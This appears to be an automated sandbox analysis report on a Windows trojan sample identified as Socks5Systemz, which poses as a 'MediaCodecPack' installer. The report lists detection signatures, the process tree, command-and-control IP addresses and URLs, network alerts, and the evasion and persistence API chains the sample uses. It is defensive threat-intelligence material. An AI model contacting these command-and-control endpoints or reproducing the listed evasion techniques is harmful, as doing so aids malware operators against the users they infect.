Windows Analysis Report
newwork.exe.1.exe

Overview

General Information

Sample name: newwork.exe.1.exe
Analysis ID: 1577462
MD5: 27b4fa67c0810bc212077971a00854ea
SHA1: 39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
SHA256: 2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
Tags: bulletproof, exe, Socks5Systemz, user-abus3reports

Detection

Socks5Systemz
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • newwork.exe.1.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\newwork.exe.1.exe" MD5: 27B4FA67C0810BC212077971A00854EA)
    • newwork.exe.1.tmp (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" MD5: ED6A19AD054AD0172201AF725324781B)
      • mediacodecpack.exe (PID: 6172 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i MD5: 49FC2D4BA26F2EEF94CCC6B71EB0AD96)
  • cleanup
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-F43ND.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000001.00000002.3557131784.00000000058E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000002.00000000.1708594819.0000000000401000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
Process Memory Space: mediacodecpack.exe PID: 6172 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security

Source | Rule | Description | Author
2.0.mediacodecpack.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
                    No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:59:10.577867+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49887 | 188.119.66.185 | 443 | TCP
2024-12-18T13:59:16.363973+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49904 | 188.119.66.185 | 443 | TCP
2024-12-18T13:59:11.506476+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49887 | 188.119.66.185 | 443 | TCP
2024-12-18T13:59:17.056119+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49904 | 188.119.66.185 | 443 | TCP

                    AV Detection

Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4 | Avira URL Cloud: Label: malware
Source: newwork.exe.1.exe | ReversingLabs: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 1_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0045D254 ArcFourCrypt, 1_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0045D23C ArcFourCrypt, 1_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130

                    Compliance

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 2.2.mediacodecpack.exe.400000.0.unpack
Source: newwork.exe.1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: Binary string: msvcp71.pdbx# source: is-NF7R8.tmp.1.dr
Source: Binary string: msvcr71.pdb< source: is-R0E3S.tmp.1.dr
Source: Binary string: msvcp71.pdb source: is-NF7R8.tmp.1.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-2R56A.tmp.1.dr
Source: Binary string: msvcr71.pdb source: is-R0E3S.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463CDC
Source: global traffic | TCP traffic: 192.168.2.4:49896 -> 46.8.225.74:2024
Source: Joe Sandbox View | IP Address: 46.8.225.74 46.8.225.74
Source: Joe Sandbox View | IP Address: 188.119.66.185 188.119.66.185
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49887 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49904 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49904 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49887 -> 188.119.66.185:443
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 2_2_00B02B95 WSASetLastError,WSARecv,WSASetLastError,select, 2_2_00B02B95
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: newwork.exe.1.tmp, 00000001.00000002.3557131784.00000000059AC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000000.1708971445.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.2.dr, mediacodecpack.exe.1.dr, is-F43ND.tmp.1.dr | String found in binary or memory: http://wonderwork.ucoz.com/
Source: newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
Source: newwork.exe.1.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: newwork.exe.1.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/04
Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/405117-2476756634-1002W=
Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325
Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3555972784.000000000092E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4
Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/allowedCert_OS_1
Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/priseCertificates
Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/rosoft
Source: newwork.exe.1.exe, 00000000.00000003.1696268555.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.3556231844.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696174472.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698014219.0000000003100000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556862399.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698150930.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556348257.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown | Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown | Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: is-2R56A.tmp.1.dr | Binary or memory string: DirectDrawCreateExmemstr_998bbfeb-d
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0042F520 NtdllDefWindowProc_A, 1_2_0042F520
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00423B84 NtdllDefWindowProc_A, 1_2_00423B84
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004125D8 NtdllDefWindowProc_A, 1_2_004125D8
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00478AC0 NtdllDefWindowProc_A, 1_2_00478AC0
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00457594
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 1_2_0042E934
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_004555E4
Source: Joe Sandbox View | Dropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: String function: 00B22A10 appears 135 times
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: String function: 00B17760 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00408C0C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00406AC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 0040595C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00457F1C appears 73 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00445DD4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00457D10 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 004344DC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 004078F4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00403494 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00403684 appears 225 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 00453344 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: String function: 004460A4 appears 59 times
Source: newwork.exe.1.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: newwork.exe.1.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: newwork.exe.1.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-F7SVI.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-F7SVI.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-F7SVI.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.2.drStatic PE information: Number of sections : 19 > 10
                    Source: is-7LIEI.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal96.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B0F8D0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,2_2_00B0F8D0
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_00401CE4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00401C49 StartServiceCtrlDispatcherA,2_2_00401C49
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00401C49 StartServiceCtrlDispatcherA,2_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmpJump to behavior
                    Source: Yara matchFile source: 2.0.mediacodecpack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3557131784.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.1708594819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-F43ND.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
